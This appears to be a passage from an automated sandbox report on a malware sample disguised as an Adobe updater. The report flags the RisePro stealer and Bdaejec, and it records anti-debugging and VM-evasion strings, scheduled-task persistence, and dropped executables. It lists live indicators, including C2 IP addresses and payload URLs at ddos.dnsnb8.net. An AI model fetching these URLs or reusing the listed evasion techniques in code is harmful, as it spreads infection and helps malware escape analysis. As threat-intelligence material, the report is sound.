Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000A.00000002.4126911712.00000000005CD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}d
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}^
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
Source: AdobeUpdaterV131.exe, 00000000.00000002.4130747747.0000000000F5C000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}L
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MPGPH131.exe, 00000009.00000003.1759337474.00000000014A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.AVJ
Source: Amcache.hve.1.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000124D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.0000000001151000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C0
Source: Amcache.hve.1.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp\xRp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_04FB008C Start: 04FB00B5 End: 04FB005C 10_2_04FB008C
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_05140442 Start: 051407BF End: 0514045E 14_2_05140442
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_04F1074F rdtsc 0_2_04F1074F
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00BC0044 mov eax, dword ptr fs:[00000030h] 0_2_00BC0044
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_00634560 mov eax, dword ptr fs:[00000030h] 0_2_00634560
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_01050044 mov eax, dword ptr fs:[00000030h] 9_2_01050044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00AC4560 mov eax, dword ptr fs:[00000030h] 9_2_00AC4560
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_01050044 mov eax, dword ptr fs:[00000030h] 10_2_01050044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00AC4560 mov eax, dword ptr fs:[00000030h] 10_2_00AC4560
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_00B60044 mov eax, dword ptr fs:[00000030h] 12_2_00B60044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_005D4560 mov eax, dword ptr fs:[00000030h] 12_2_005D4560
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_00B60044 mov eax, dword ptr fs:[00000030h] 14_2_00B60044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_005D4560 mov eax, dword ptr fs:[00000030h] 14_2_005D4560
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" " Jump to behavior
Source: SciTE.exe.1.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: AdobeUpdaterV131.exe, AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: um72Program Manager
Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: oum72Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006FBF8B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_006FBF8B
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_004E139F
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480703 Sample: AdobeUpdaterV131.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 8 other signatures 2->67 9 AdobeUpdaterV131.exe 1 10 2->9         started        14 RageMP131.exe 2 2->14         started        16 MPGPH131.exe 2 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 59 193.233.132.62, 49732, 49737, 49738 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\Temp\xRp.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 9->79 81 Tries to evade debugger and weak emulator (self modifying code) 9->81 83 Tries to detect virtualization through RDTSC time measurements 9->83 20 xRp.exe 34 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        85 Antivirus detection for dropped file 14->85 87 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->87 89 Machine Learning detection for dropped file 14->89 91 Hides threads from debuggers 16->91 93 Potentially malicious time measurement code found 16->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->97 29 xRp.exe 1 26 18->29         started        file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49730, 49731, 49748 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Detected unpacking (changes PE section rights) 20->71 73 Machine Learning detection for dropped file 20->73 75 Infects executable files (exe, dll, sys, html) 20->75 31 WerFault.exe 21 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
44.221.84.105
 ddos.dnsnb8.net United States
14618 AMAZON-AESUS false
193.233.132.62
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false

Contacted Domains

Name IP Active
ddos.dnsnb8.net 44.221.84.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar true
  • Avira URL Cloud: phishing
 unknown
http://ddos.dnsnb8.net:799/cj//k2.rar true
  • Avira URL Cloud: phishing
 unknown
http://ddos.dnsnb8.net:799/cj//k1.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k5.rar false
  • Avira URL Cloud: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k4.rar false
  • Avira URL Cloud: phishing
 unknown